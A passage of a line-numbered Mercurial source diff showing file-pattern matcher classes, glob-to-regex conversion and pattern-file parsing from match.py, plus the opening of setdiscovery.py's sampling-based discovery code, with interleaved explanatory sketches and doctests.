879 879 The paths are remapped to remove/insert the path as needed:
880 880
881 881 >>> from . import pycompat
882 882 >>> m1 = match(b'root', b'', [b'a.txt', b'sub/b.txt'])
883 883 >>> m2 = subdirmatcher(b'sub', m1)
884 884 >>> m2(b'a.txt')
885 885 False
886 886 >>> m2(b'b.txt')
887 887 True
888 888 >>> m2.matchfn(b'a.txt')
889 889 False
890 890 >>> m2.matchfn(b'b.txt')
891 891 True
892 892 >>> m2.files()
893 893 ['b.txt']
894 894 >>> m2.exact(b'b.txt')
895 895 True
896 896 >>> def bad(f, msg):
897 897 ... print(pycompat.sysstr(b"%s: %s" % (f, msg)))
898 898 >>> m1.bad = bad
899 899 >>> m2.bad(b'x.txt', b'No such file')
900 900 sub/x.txt: No such file
901 901 """
902 902
903 903 def __init__(self, path, matcher):
904 904 super(subdirmatcher, self).__init__()
905 905 self._path = path
906 906 self._matcher = matcher
907 907 self._always = matcher.always()
908 908
909 909 self._files = [f[len(path) + 1:] for f in matcher._files
910 910 if f.startswith(path + "/")]
911 911
912 912 # If the parent repo had a path to this subrepo and the matcher is
913 913 # a prefix matcher, this submatcher always matches.
914 914 if matcher.prefix():
915 915 self._always = any(f == path for f in matcher._files)
916 916
917 917 def bad(self, f, msg):
918 918 self._matcher.bad(self._path + "/" + f, msg)
919 919
920 920 def matchfn(self, f):
921 921 # Some information is lost in the superclass's constructor, so we
922 922 # can not accurately create the matching function for the subdirectory
923 923 # from the inputs. Instead, we override matchfn() and visitdir() to
924 924 # call the original matcher with the subdirectory path prepended.
925 925 return self._matcher.matchfn(self._path + "/" + f)
926 926
927 927 def visitdir(self, dir):
928 928 dir = normalizerootdir(dir, 'visitdir')
929 929 if dir == '':
930 930 dir = self._path
931 931 else:
932 932 dir = self._path + "/" + dir
933 933 return self._matcher.visitdir(dir)
934 934
935 935 def visitchildrenset(self, dir):
936 936 dir = normalizerootdir(dir, 'visitchildrenset')
937 937 if dir == '':
938 938 dir = self._path
939 939 else:
940 940 dir = self._path + "/" + dir
941 941 return self._matcher.visitchildrenset(dir)
942 942
943 943 def always(self):
944 944 return self._always
945 945
946 946 def prefix(self):
947 947 return self._matcher.prefix() and not self._always
948 948
949 949 @encoding.strmethod
950 950 def __repr__(self):
951 951 return ('<subdirmatcher path=%r, matcher=%r>' %
952 952 (self._path, self._matcher))
953 953
954 954 class prefixdirmatcher(basematcher):
955 955 """Adapt a matcher to work on a parent directory.
956 956
957 957 The matcher's non-matching-attributes (bad, explicitdir, traversedir) are
958 958 ignored.
959 959
960 960 The prefix path should usually be the relative path from the root of
961 961 this matcher to the root of the wrapped matcher.
962 962
963 963 >>> m1 = match(util.localpath(b'root/d/e'), b'f', [b'../a.txt', b'b.txt'])
964 964 >>> m2 = prefixdirmatcher(b'd/e', m1)
965 965 >>> m2(b'a.txt')
966 966 False
967 967 >>> m2(b'd/e/a.txt')
968 968 True
969 969 >>> m2(b'd/e/b.txt')
970 970 False
971 971 >>> m2.files()
972 972 ['d/e/a.txt', 'd/e/f/b.txt']
973 973 >>> m2.exact(b'd/e/a.txt')
974 974 True
975 975 >>> m2.visitdir(b'd')
976 976 True
977 977 >>> m2.visitdir(b'd/e')
978 978 True
979 979 >>> m2.visitdir(b'd/e/f')
980 980 True
981 981 >>> m2.visitdir(b'd/e/g')
982 982 False
983 983 >>> m2.visitdir(b'd/ef')
984 984 False
985 985 """
986 986
987 987 def __init__(self, path, matcher, badfn=None):
988 988 super(prefixdirmatcher, self).__init__(badfn)
989 989 if not path:
990 990 raise error.ProgrammingError('prefix path must not be empty')
991 991 self._path = path
992 992 self._pathprefix = path + '/'
993 993 self._matcher = matcher
994 994
995 995 @propertycache
996 996 def _files(self):
997 997 return [self._pathprefix + f for f in self._matcher._files]
998 998
999 999 def matchfn(self, f):
1000 1000 if not f.startswith(self._pathprefix):
1001 1001 return False
1002 1002 return self._matcher.matchfn(f[len(self._pathprefix):])
1003 1003
1004 1004 @propertycache
1005 1005 def _pathdirs(self):
1006 1006 return set(util.finddirs(self._path))
1007 1007
1008 1008 def visitdir(self, dir):
1009 1009 if dir == self._path:
1010 1010 return self._matcher.visitdir('')
1011 1011 if dir.startswith(self._pathprefix):
1012 1012 return self._matcher.visitdir(dir[len(self._pathprefix):])
1013 1013 return dir in self._pathdirs
1014 1014
1015 1015 def visitchildrenset(self, dir):
1016 1016 if dir == self._path:
1017 1017 return self._matcher.visitchildrenset('')
1018 1018 if dir.startswith(self._pathprefix):
1019 1019 return self._matcher.visitchildrenset(dir[len(self._pathprefix):])
1020 1020 if dir in self._pathdirs:
1021 1021 return 'this'
1022 1022 return set()
1023 1023
1024 1024 def isexact(self):
1025 1025 return self._matcher.isexact()
1026 1026
1027 1027 def prefix(self):
1028 1028 return self._matcher.prefix()
1029 1029
1030 1030 @encoding.strmethod
1031 1031 def __repr__(self):
1032 1032 return ('<prefixdirmatcher path=%r, matcher=%r>'
1033 1033 % (pycompat.bytestr(self._path), self._matcher))
1034 1034
1035 1035 class unionmatcher(basematcher):
1036 1036 """A matcher that is the union of several matchers.
1037 1037
1038 1038 The non-matching-attributes (bad, explicitdir, traversedir) are taken from
1039 1039 the first matcher.
1040 1040 """
1041 1041
1042 1042 def __init__(self, matchers):
1043 1043 m1 = matchers[0]
1044 1044 super(unionmatcher, self).__init__()
1045 1045 self.explicitdir = m1.explicitdir
1046 1046 self.traversedir = m1.traversedir
1047 1047 self._matchers = matchers
1048 1048
1049 1049 def matchfn(self, f):
1050 1050 for match in self._matchers:
1051 1051 if match(f):
1052 1052 return True
1053 1053 return False
1054 1054
1055 1055 def visitdir(self, dir):
1056 1056 r = False
1057 1057 for m in self._matchers:
1058 1058 v = m.visitdir(dir)
1059 1059 if v == 'all':
1060 1060 return v
1061 1061 r |= v
1062 1062 return r
1063 1063
1064 1064 def visitchildrenset(self, dir):
1065 1065 r = set()
1066 1066 this = False
1067 1067 for m in self._matchers:
1068 1068 v = m.visitchildrenset(dir)
1069 1069 if not v:
1070 1070 continue
1071 1071 if v == 'all':
1072 1072 return v
1073 1073 if this or v == 'this':
1074 1074 this = True
1075 1075 # don't break, we might have an 'all' in here.
1076 1076 continue
1077 1077 assert isinstance(v, set)
1078 1078 r = r.union(v)
1079 1079 if this:
1080 1080 return 'this'
1081 1081 return r
1082 1082
1083 1083 @encoding.strmethod
1084 1084 def __repr__(self):
1085 1085 return ('<unionmatcher matchers=%r>' % self._matchers)
1086 1086
1087 1087 def patkind(pattern, default=None):
1088 1088 '''If pattern is 'kind:pat' with a known kind, return kind.
1089 1089
1090 1090 >>> patkind(br're:.*\.c$')
1091 1091 're'
1092 1092 >>> patkind(b'glob:*.c')
1093 1093 'glob'
1094 1094 >>> patkind(b'relpath:test.py')
1095 1095 'relpath'
1096 1096 >>> patkind(b'main.py')
1097 1097 >>> patkind(b'main.py', default=b're')
1098 1098 're'
1099 1099 '''
1100 1100 return _patsplit(pattern, default)[0]
1101 1101
1102 1102 def _patsplit(pattern, default):
1103 1103 """Split a string into the optional pattern kind prefix and the actual
1104 1104 pattern."""
1105 1105 if ':' in pattern:
1106 1106 kind, pat = pattern.split(':', 1)
1107 1107 if kind in allpatternkinds:
1108 1108 return kind, pat
1109 1109 return default, pattern
1110 1110
1111 1111 def _globre(pat):
1112 1112 r'''Convert an extended glob string to a regexp string.
1113 1113
1114 1114 >>> from . import pycompat
1115 1115 >>> def bprint(s):
1116 1116 ... print(pycompat.sysstr(s))
1117 1117 >>> bprint(_globre(br'?'))
1118 1118 .
1119 1119 >>> bprint(_globre(br'*'))
1120 1120 [^/]*
1121 1121 >>> bprint(_globre(br'**'))
1122 1122 .*
1123 1123 >>> bprint(_globre(br'**/a'))
1124 1124 (?:.*/)?a
1125 1125 >>> bprint(_globre(br'a/**/b'))
1126 1126 a/(?:.*/)?b
1127 1127 >>> bprint(_globre(br'[a*?!^][^b][!c]'))
1128 1128 [a*?!^][\^b][^c]
1129 1129 >>> bprint(_globre(br'{a,b}'))
1130 1130 (?:a|b)
1131 1131 >>> bprint(_globre(br'.\*\?'))
1132 1132 \.\*\?
1133 1133 '''
1134 1134 i, n = 0, len(pat)
1135 1135 res = ''
1136 1136 group = 0
1137 1137 escape = util.stringutil.regexbytesescapemap.get
1138 1138 def peek():
1139 1139 return i < n and pat[i:i + 1]
1140 1140 while i < n:
1141 1141 c = pat[i:i + 1]
1142 1142 i += 1
1143 1143 if c not in '*?[{},\\':
1144 1144 res += escape(c, c)
1145 1145 elif c == '*':
1146 1146 if peek() == '*':
1147 1147 i += 1
1148 1148 if peek() == '/':
1149 1149 i += 1
1150 1150 res += '(?:.*/)?'
1151 1151 else:
1152 1152 res += '.*'
1153 1153 else:
1154 1154 res += '[^/]*'
1155 1155 elif c == '?':
1156 1156 res += '.'
1157 1157 elif c == '[':
1158 1158 j = i
1159 1159 if j < n and pat[j:j + 1] in '!]':
1160 1160 j += 1
1161 1161 while j < n and pat[j:j + 1] != ']':
1162 1162 j += 1
1163 1163 if j >= n:
1164 1164 res += '\\['
1165 1165 else:
1166 1166 stuff = pat[i:j].replace('\\','\\\\')
1167 1167 i = j + 1
1168 1168 if stuff[0:1] == '!':
1169 1169 stuff = '^' + stuff[1:]
1170 1170 elif stuff[0:1] == '^':
1171 1171 stuff = '\\' + stuff
1172 1172 res = '%s[%s]' % (res, stuff)
1173 1173 elif c == '{':
1174 1174 group += 1
1175 1175 res += '(?:'
1176 1176 elif c == '}' and group:
1177 1177 res += ')'
1178 1178 group -= 1
1179 1179 elif c == ',' and group:
1180 1180 res += '|'
1181 1181 elif c == '\\':
1182 1182 p = peek()
1183 1183 if p:
1184 1184 i += 1
1185 1185 res += escape(p, p)
1186 1186 else:
1187 1187 res += escape(c, c)
1188 1188 else:
1189 1189 res += escape(c, c)
1190 1190 return res
1191 1191
1192 1192 def _regex(kind, pat, globsuffix):
1193 1193 '''Convert a (normalized) pattern of any kind into a
1194 1194 regular expression.
1195 1195 globsuffix is appended to the regexp of globs.'''
1196 1196
1197 1197 if rustmod is not None:
1198 1198 try:
1199 1199 return rustmod.build_single_regex(
1200 1200 kind,
1201 1201 pat,
1202 1202 globsuffix
1203 1203 )
1204 1204 except rustmod.PatternError:
1205 1205 raise error.ProgrammingError(
1206 1206 'not a regex pattern: %s:%s' % (kind, pat)
1207 1207 )
1208 1208
1209 1209 if not pat and kind in ('glob', 'relpath'):
1210 1210 return ''
1211 1211 if kind == 're':
1212 1212 return pat
1213 1213 if kind in ('path', 'relpath'):
1214 1214 if pat == '.':
1215 1215 return ''
1216 1216 return util.stringutil.reescape(pat) + '(?:/|$)'
1217 1217 if kind == 'rootfilesin':
1218 1218 if pat == '.':
1219 1219 escaped = ''
1220 1220 else:
1221 1221 # Pattern is a directory name.
1222 1222 escaped = util.stringutil.reescape(pat) + '/'
1223 1223 # Anything after the pattern must be a non-directory.
1224 1224 return escaped + '[^/]+$'
1225 1225 if kind == 'relglob':
1226 1226 return '(?:|.*/)' + _globre(pat) + globsuffix
1227 1227 if kind == 'relre':
1228 1228 if pat.startswith('^'):
1229 1229 return pat
1230 1230 return '.*' + pat
1231 1231 if kind in ('glob', 'rootglob'):
1232 1232 return _globre(pat) + globsuffix
1233 1233 raise error.ProgrammingError('not a regex pattern: %s:%s' % (kind, pat))
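
A few sample translations, assuming the pure-Python fallback (the Rust
implementation is expected to produce the same regexps):

>>> _regex(b'glob', b'*.c', b'$')
'[^/]*\\.c$'
>>> _regex(b'path', b'foo', b'$')
'foo(?:/|$)'
>>> _regex(b'rootfilesin', b'qux', b'$')
'qux/[^/]+$'
>>> _regex(b'relre', b'x$', b'$')
'.*x$'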
1234 1234
1235 1235 def _buildmatch(kindpats, globsuffix, root):
1236 1236 '''Return regexp string and a matcher function for kindpats.
1237 1237 globsuffix is appended to the regexp of globs.'''
1238 1238 matchfuncs = []
1239 1239
1240 1240 subincludes, kindpats = _expandsubinclude(kindpats, root)
1241 1241 if subincludes:
1242 1242 submatchers = {}
1243 1243 def matchsubinclude(f):
1244 1244 for prefix, matcherargs in subincludes:
1245 1245 if f.startswith(prefix):
1246 1246 mf = submatchers.get(prefix)
1247 1247 if mf is None:
1248 1248 mf = match(*matcherargs)
1249 1249 submatchers[prefix] = mf
1250 1250
1251 1251 if mf(f[len(prefix):]):
1252 1252 return True
1253 1253 return False
1254 1254 matchfuncs.append(matchsubinclude)
1255 1255
1256 1256 regex = ''
1257 1257 if kindpats:
1258 1258 if all(k == 'rootfilesin' for k, p, s in kindpats):
1259 1259 dirs = {p for k, p, s in kindpats}
1260 1260 def mf(f):
1261 1261 i = f.rfind('/')
1262 1262 if i >= 0:
1263 1263 dir = f[:i]
1264 1264 else:
1265 1265 dir = '.'
1266 1266 return dir in dirs
1267 1267 regex = b'rootfilesin: %s' % stringutil.pprint(list(sorted(dirs)))
1268 1268 matchfuncs.append(mf)
1269 1269 else:
1270 1270 regex, mf = _buildregexmatch(kindpats, globsuffix)
1271 1271 matchfuncs.append(mf)
1272 1272
1273 1273 if len(matchfuncs) == 1:
1274 1274 return regex, matchfuncs[0]
1275 1275 else:
1276 1276 return regex, lambda f: any(mf(f) for mf in matchfuncs)
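
When every pattern is of the 'rootfilesin' kind, the branch above skips
regexps entirely and matches on the dirname (a sketch):

>>> regex, mf = _buildmatch([(b'rootfilesin', b'qux', b'')], b'$', b'')
>>> mf(b'qux/f.txt'), mf(b'qux/sub/f.txt')
(True, False)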
1277 1277
1278 1278 MAX_RE_SIZE = 20000
1279 1279
1280 1280 def _joinregexes(regexps):
1281 1281 """gather multiple regular expressions into a single one"""
1282 1282 return '|'.join(regexps)
1283 1283
1284 1284 def _buildregexmatch(kindpats, globsuffix):
1285 1285 """Build a match function from a list of kinds and kindpats,
1286 1286 return regexp string and a matcher function.
1287 1287
1288 1288 Test a too-large input
1289 1289 >>> _buildregexmatch([
1290 1290 ... (b'relglob', b'?' * MAX_RE_SIZE, b'')
1291 1291 ... ], b'$')
1292 1292 Traceback (most recent call last):
1293 1293 ...
1294 1294 Abort: matcher pattern is too long (20009 bytes)
1295 1295 """
1296 1296 try:
1297 1297 allgroups = []
1298 1298 regexps = [_regex(k, p, globsuffix) for (k, p, s) in kindpats]
1299 1299 fullregexp = _joinregexes(regexps)
1300 1300
1301 1301 startidx = 0
1302 1302 groupsize = 0
1303 1303 for idx, r in enumerate(regexps):
1304 1304 piecesize = len(r)
1305 1305 if piecesize > MAX_RE_SIZE:
1306 1306 msg = _("matcher pattern is too long (%d bytes)") % piecesize
1307 1307 raise error.Abort(msg)
1308 1308 elif (groupsize + piecesize) > MAX_RE_SIZE:
1309 1309 group = regexps[startidx:idx]
1310 1310 allgroups.append(_joinregexes(group))
1311 1311 startidx = idx
1312 1312 groupsize = 0
1313 1313 groupsize += piecesize + 1
1314 1314
1315 1315 if startidx == 0:
1316 1316 matcher = _rematcher(fullregexp)
1317 1317 func = lambda s: bool(matcher(s))
1318 1318 else:
1319 1319 group = regexps[startidx:]
1320 1320 allgroups.append(_joinregexes(group))
1321 1321 allmatchers = [_rematcher(g) for g in allgroups]
1322 1322 func = lambda s: any(m(s) for m in allmatchers)
1323 1323 return fullregexp, func
1324 1324 except re.error:
1325 1325 for k, p, s in kindpats:
1326 1326 try:
1327 1327 _rematcher(_regex(k, p, globsuffix))
1328 1328 except re.error:
1329 1329 if s:
1330 1330 raise error.Abort(_("%s: invalid pattern (%s): %s") %
1331 1331 (s, k, p))
1332 1332 else:
1333 1333 raise error.Abort(_("invalid pattern (%s): %s") % (k, p))
1334 1334 raise error.Abort(_("invalid pattern"))
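
When the joined regexp would exceed MAX_RE_SIZE, the loop above splits the
pieces into several independently compiled groups OR'ed together at match
time; the observable behaviour is unchanged (a sketch with made-up patterns):

>>> pats = [(b'relglob', b'f%d' % i, b'') for i in range(5000)]
>>> regex, mf = _buildregexmatch(pats, b'$')
>>> mf(b'dir/f4242')
True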
1335 1335
1336 1336 def _patternrootsanddirs(kindpats):
1337 1337 '''Returns roots and directories corresponding to each pattern.
1338 1338
1339 1339 This calculates the roots and directories exactly matching the patterns and
1340 1340 returns a tuple of (roots, dirs) for each. It does not return other
1341 1341 directories which may also need to be considered, like the parent
1342 1342 directories.
1343 1343 '''
1344 1344 r = []
1345 1345 d = []
1346 1346 for kind, pat, source in kindpats:
1347 1347 if kind in ('glob', 'rootglob'): # find the non-glob prefix
1348 1348 root = []
1349 1349 for p in pat.split('/'):
1350 1350 if '[' in p or '{' in p or '*' in p or '?' in p:
1351 1351 break
1352 1352 root.append(p)
1353 1353 r.append('/'.join(root))
1354 1354 elif kind in ('relpath', 'path'):
1355 1355 if pat == '.':
1356 1356 pat = ''
1357 1357 r.append(pat)
1358 1358 elif kind in ('rootfilesin',):
1359 1359 if pat == '.':
1360 1360 pat = ''
1361 1361 d.append(pat)
1362 1362 else: # relglob, re, relre
1363 1363 r.append('')
1364 1364 return r, d
1365 1365
1366 1366 def _roots(kindpats):
1367 1367 '''Returns root directories to match recursively from the given patterns.'''
1368 1368 roots, dirs = _patternrootsanddirs(kindpats)
1369 1369 return roots
1370 1370
1371 1371 def _rootsdirsandparents(kindpats):
1372 1372 '''Returns roots and exact directories from patterns.
1373 1373
1374 1374 `roots` are directories to match recursively, `dirs` should
1375 1375 be matched non-recursively, and `parents` are the implicitly required
1376 1376 directories to walk to items in either roots or dirs.
1377 1377
1378 1378 Returns a tuple of (roots, dirs, parents).
1379 1379
1380 1380 >>> r = _rootsdirsandparents(
1381 1381 ... [(b'glob', b'g/h/*', b''), (b'glob', b'g/h', b''),
1382 1382 ... (b'glob', b'g*', b'')])
1383 1383 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1384 1384 (['g/h', 'g/h', ''], []) ['', 'g']
1385 1385 >>> r = _rootsdirsandparents(
1386 1386 ... [(b'rootfilesin', b'g/h', b''), (b'rootfilesin', b'', b'')])
1387 1387 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1388 1388 ([], ['g/h', '']) ['', 'g']
1389 1389 >>> r = _rootsdirsandparents(
1390 1390 ... [(b'relpath', b'r', b''), (b'path', b'p/p', b''),
1391 1391 ... (b'path', b'', b'')])
1392 1392 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1393 1393 (['r', 'p/p', ''], []) ['', 'p']
1394 1394 >>> r = _rootsdirsandparents(
1395 1395 ... [(b'relglob', b'rg*', b''), (b're', b're/', b''),
1396 1396 ... (b'relre', b'rr', b'')])
1397 1397 >>> print(r[0:2], sorted(r[2])) # the set has an unstable output
1398 1398 (['', '', ''], []) ['']
1399 1399 '''
1400 1400 r, d = _patternrootsanddirs(kindpats)
1401 1401
1402 1402 p = set()
1403 1403 # Add the parents as non-recursive/exact directories, since they must be
1404 1404 # scanned to get to either the roots or the other exact directories.
1405 1405 p.update(util.dirs(d))
1406 1406 p.update(util.dirs(r))
1407 1407
1408 1408 # FIXME: all uses of this function convert these to sets, do so before
1409 1409 # returning.
1410 1410 # FIXME: all uses of this function do not need anything in 'roots' and
1411 1411 # 'dirs' to also be in 'parents', consider removing them before returning.
1412 1412 return r, d, p
1413 1413
1414 1414 def _explicitfiles(kindpats):
1415 1415 '''Returns the potential explicit filenames from the patterns.
1416 1416
1417 1417 >>> _explicitfiles([(b'path', b'foo/bar', b'')])
1418 1418 ['foo/bar']
1419 1419 >>> _explicitfiles([(b'rootfilesin', b'foo/bar', b'')])
1420 1420 []
1421 1421 '''
1422 1422 # Keep only the pattern kinds where one can specify filenames (vs only
1423 1423 # directory names).
1424 1424 filable = [kp for kp in kindpats if kp[0] not in ('rootfilesin',)]
1425 1425 return _roots(filable)
1426 1426
1427 1427 def _prefix(kindpats):
1428 1428 '''Whether all the patterns match a prefix (i.e. recursively)'''
1429 1429 for kind, pat, source in kindpats:
1430 1430 if kind not in ('path', 'relpath'):
1431 1431 return False
1432 1432 return True
1433 1433
1434 1434 _commentre = None
1435 1435
1436 1436 def readpatternfile(filepath, warn, sourceinfo=False):
1437 1437 '''parse a pattern file, returning a list of
1438 1438 patterns. These patterns should be given to compile()
1439 1439 to be validated and converted into a match function.
1440 1440
1441 1441 trailing white space is dropped.
1442 1442 the escape character is backslash.
1443 1443 comments start with #.
1444 1444 empty lines are skipped.
1445 1445
1446 1446 lines can be of the following formats:
1447 1447
1448 1448 syntax: regexp # defaults following lines to non-rooted regexps
1449 1449 syntax: glob # defaults following lines to non-rooted globs
1450 1450 re:pattern # non-rooted regular expression
1451 1451 glob:pattern # non-rooted glob
1452 1452 rootglob:pat # rooted glob (same root as ^ in regexps)
1453 1453 pattern # pattern of the current default type
1454 1454
1455 1455 if sourceinfo is set, returns a list of tuples:
1456 1456 (pattern, lineno, originalline).
1457 1457 This is useful to debug ignore patterns.
1458 1458 '''
1459 1459
1460 1460 if rustmod is not None:
1461 1461 result, warnings = rustmod.read_pattern_file(
1462 1462 filepath,
1463 1463 bool(warn),
1464 1464 sourceinfo,
1465 1465 )
1466 1466
1467 1467 for warning_params in warnings:
1468 1468 # Can't be easily emitted from Rust, because it would require
1469 1469 # a mechanism for both gettext and calling the `warn` function.
1470 1470 warn(_("%s: ignoring invalid syntax '%s'\n") % warning_params)
1471 1471
1472 1472 return result
1473 1473
1474 1474 syntaxes = {
1475 1475 're': 'relre:',
1476 1476 'regexp': 'relre:',
1477 1477 'glob': 'relglob:',
1478 1478 'rootglob': 'rootglob:',
1479 1479 'include': 'include',
1480 1480 'subinclude': 'subinclude',
1481 1481 }
1482 1482 syntax = 'relre:'
1483 1483 patterns = []
1484 1484
1485 1485 fp = open(filepath, 'rb')
1486 1486 for lineno, line in enumerate(util.iterfile(fp), start=1):
1487 1487 if "#" in line:
1488 1488 global _commentre
1489 1489 if not _commentre:
1490 1490 _commentre = util.re.compile(br'((?:^|[^\\])(?:\\\\)*)#.*')
1491 1491 # remove comments prefixed by an even number of escapes
1492 1492 m = _commentre.search(line)
1493 1493 if m:
1494 1494 line = line[:m.end(1)]
1495 1495 # fixup properly escaped comments that survived the above
1496 1496 line = line.replace("\\#", "#")
1497 1497 line = line.rstrip()
1498 1498 if not line:
1499 1499 continue
1500 1500
1501 1501 if line.startswith('syntax:'):
1502 1502 s = line[7:].strip()
1503 1503 try:
1504 1504 syntax = syntaxes[s]
1505 1505 except KeyError:
1506 1506 if warn:
1507 1507 warn(_("%s: ignoring invalid syntax '%s'\n") %
1508 1508 (filepath, s))
1509 1509 continue
1510 1510
1511 1511 linesyntax = syntax
1512 1512 for s, rels in syntaxes.iteritems():
1513 1513 if line.startswith(rels):
1514 1514 linesyntax = rels
1515 1515 line = line[len(rels):]
1516 1516 break
1517 1517 elif line.startswith(s+':'):
1518 1518 linesyntax = rels
1519 1519 line = line[len(s) + 1:]
1520 1520 break
1521 1521 if sourceinfo:
1522 1522 patterns.append((linesyntax + line, lineno, line))
1523 1523 else:
1524 1524 patterns.append(linesyntax + line)
1525 1525 fp.close()
1526 1526 return patterns
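
A hedged sketch of the parsing above. Given a hypothetical pattern file
containing:

    syntax: glob
    *.pyc
    re:^build/

readpatternfile(path, warn) returns ['relglob:*.pyc', 'relre:^build/']: the
'syntax:' line changes the default applied to bare patterns, while an
explicit 'kind:' prefix on a line overrides it.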
@@ -1,463 +1,463 b''
1 1 # setdiscovery.py - improved discovery of common nodeset for mercurial
2 2 #
3 3 # Copyright 2010 Benoit Boissinot <bboissin@gmail.com>
4 4 # and Peter Arrenbrecht <peter@arrenbrecht.ch>
5 5 #
6 6 # This software may be used and distributed according to the terms of the
7 7 # GNU General Public License version 2 or any later version.
8 8 """
9 9 The algorithm works in the following way. You have two repositories:
10 10 local and remote. They both contain a DAG of changelists.
11 11
12 12 The goal of the discovery protocol is to find one set of nodes, *common*,
13 13 the set of nodes shared by local and remote.
14 14
15 15 One of the issues with the original protocol was latency: it could
16 16 potentially require lots of roundtrips to discover that the local repo was a
17 17 subset of the remote (which is a very common case; you usually have few
18 18 changes compared to upstream, while upstream probably had lots of development).
19 19
20 20 The new protocol only requires one interface for the remote repo: `known()`,
21 21 which given a set of changelists tells you if they are present in the DAG.
22 22
23 23 The algorithm then works as follows:
24 24
25 25 - We will be using three sets, `common`, `missing`, `unknown`. Originally
26 26 all nodes are in `unknown`.
27 27 - Take a sample from `unknown`, call `remote.known(sample)`
28 28 - For each node that remote knows, move it and all its ancestors to `common`
29 29 - For each node that remote doesn't know, move it and all its descendants
30 30 to `missing`
31 31 - Iterate until `unknown` is empty
32 32
33 33 There are a couple of optimizations. First, instead of starting with a random
34 34 sample of missing, start by sending all heads; in the case where the local
35 35 repo is a subset, you compute the answer in one round trip.
36 36
37 37 Then you can do something similar to the bisecting strategy used when
38 38 finding faulty changesets. Instead of random samples, you can try picking
39 39 nodes that will maximize the number of nodes that will be
40 40 classified with them (since all ancestors or descendants will be marked as well).
41 41 """
42 42
43 43 from __future__ import absolute_import
44 44
45 45 import collections
46 46 import random
47 47
48 48 from .i18n import _
49 49 from .node import (
50 50 nullid,
51 51 nullrev,
52 52 )
53 53 from . import (
54 54 error,
55 55 policy,
56 56 util,
57 57 )
58 58
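
The loop described in the module docstring, reduced to a self-contained
sketch (the rev -> parents dict encoding, the head-only sampling and the
remoteknows predicate are made up for illustration; the real code uses the
changelog and the partialdiscovery class below):

def _sketchdiscovery(parentmap, remoteknows):
    def ancestors(rev):
        # walk the made-up DAG back to its roots
        seen, stack = set(), [rev]
        while stack:
            r = stack.pop()
            if r not in seen:
                seen.add(r)
                stack.extend(parentmap[r])
        return seen
    unknown = set(parentmap)
    common, missing = set(), set()
    while unknown:
        rev = max(unknown)  # stand-in for head-first/bisect-style sampling
        if remoteknows(rev):
            newcommon = ancestors(rev) & unknown
            common |= newcommon
            unknown -= newcommon
        else:
            # everything that descends from a missing rev is missing too
            newmissing = {r for r in unknown if rev in ancestors(r)}
            missing |= newmissing
            unknown -= newmissing
    return common, missing

# linear history 0..3 where the remote only has revs 0 and 1:
# _sketchdiscovery({0: [], 1: [0], 2: [1], 3: [2]}, lambda r: r <= 1)
# returns ({0, 1}, {2, 3})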
59 59 def _updatesample(revs, heads, sample, parentfn, quicksamplesize=0):
60 60 """update an existing sample to match the expected size
61 61
62 62 The sample is updated with revs exponentially distant from each head of the
63 63 <revs> set. (H~1, H~2, H~4, H~8, etc).
64 64
65 65 If a target size is specified, the sampling will stop once this size is
66 66 reached. Otherwise sampling will happen until roots of the <revs> set are
67 67 reached.
68 68
69 69 :revs: set of revs we want to discover (if None, assume the whole dag)
70 70 :heads: set of DAG head revs
71 71 :sample: a sample to update
72 72 :parentfn: a callable to resolve parents for a revision
73 73 :quicksamplesize: optional target size of the sample"""
74 74 dist = {}
75 75 visit = collections.deque(heads)
76 76 seen = set()
77 77 factor = 1
78 78 while visit:
79 79 curr = visit.popleft()
80 80 if curr in seen:
81 81 continue
82 82 d = dist.setdefault(curr, 1)
83 83 if d > factor:
84 84 factor *= 2
85 85 if d == factor:
86 86 sample.add(curr)
87 87 if quicksamplesize and (len(sample) >= quicksamplesize):
88 88 return
89 89 seen.add(curr)
90 90
91 91 for p in parentfn(curr):
92 92 if p != nullrev and (not revs or p in revs):
93 93 dist.setdefault(p, d + 1)
94 94 visit.append(p)
95 95
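For intuition, a toy run on hypothetical data (not from the test suite): a
linear chain of 100 revisions where each revision's sole parent is rev - 1,
sampled from head 99, picks revisions at exponentially growing distances:

    def parentfn(rev):
        # linear chain: every revision has exactly one parent, rev - 1
        return [rev - 1] if rev > 0 else []

    sample = set()
    _updatesample(None, [99], sample, parentfn)
    print(sorted(sample))   # [36, 68, 84, 92, 96, 98, 99]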
96 96 def _limitsample(sample, desiredlen, randomize=True):
97 97 """return a random subset of sample of at most desiredlen item.
98 98
99 99 If randomize is False, though, a deterministic subset is returned.
100 100 This is meant for integration tests.
101 101 """
102 102 if len(sample) <= desiredlen:
103 103 return sample
104 104 if randomize:
105 105 return set(random.sample(sample, desiredlen))
106 106 sample = list(sample)
107 107 sample.sort()
108 108 return set(sample[:desiredlen])
109 109
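For example, in the deterministic mode (a tiny illustration, not from the test
suite):

    assert _limitsample({9, 3, 7, 1}, 2, randomize=False) == {1, 3}
    assert _limitsample({9, 3}, 5) == {9, 3}  # small enough: returned as-is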
110 110 class partialdiscovery(object):
111 111 """an object representing ongoing discovery
112 112
113 113 Fed with data from the remote repository, this object keeps track of the
114 114 current set of changesets in various states:
115 115
116 116 - common: revs also known remotely
117 117 - undecided: revs we don't have information on yet
118 118 - missing: revs missing remotely
119 119 (all tracked revisions are known locally)
120 120 """
121 121
122 122 def __init__(self, repo, targetheads, respectsize, randomize=True):
123 123 self._repo = repo
124 124 self._targetheads = targetheads
125 125 self._common = repo.changelog.incrementalmissingrevs()
126 126 self._undecided = None
127 127 self.missing = set()
128 128 self._childrenmap = None
129 129 self._respectsize = respectsize
130 130 self.randomize = randomize
131 131
132 132 def addcommons(self, commons):
133 133 """register nodes known as common"""
134 134 self._common.addbases(commons)
135 135 if self._undecided is not None:
136 136 self._common.removeancestorsfrom(self._undecided)
137 137
138 138 def addmissings(self, missings):
139 139 """register some nodes as missing"""
140 140 newmissing = self._repo.revs('%ld::%ld', missings, self.undecided)
141 141 if newmissing:
142 142 self.missing.update(newmissing)
143 143 self.undecided.difference_update(newmissing)
144 144
145 145 def addinfo(self, sample):
146 146 """consume an iterable of (rev, known) tuples"""
147 147 common = set()
148 148 missing = set()
149 149 for rev, known in sample:
150 150 if known:
151 151 common.add(rev)
152 152 else:
153 153 missing.add(rev)
154 154 if common:
155 155 self.addcommons(common)
156 156 if missing:
157 157 self.addmissings(missing)
158 158
159 159 def hasinfo(self):
160 160 """return True is we have any clue about the remote state"""
161 161 return self._common.hasbases()
162 162
163 163 def iscomplete(self):
164 164 """True if all the necessary data have been gathered"""
165 165 return self._undecided is not None and not self._undecided
166 166
167 167 @property
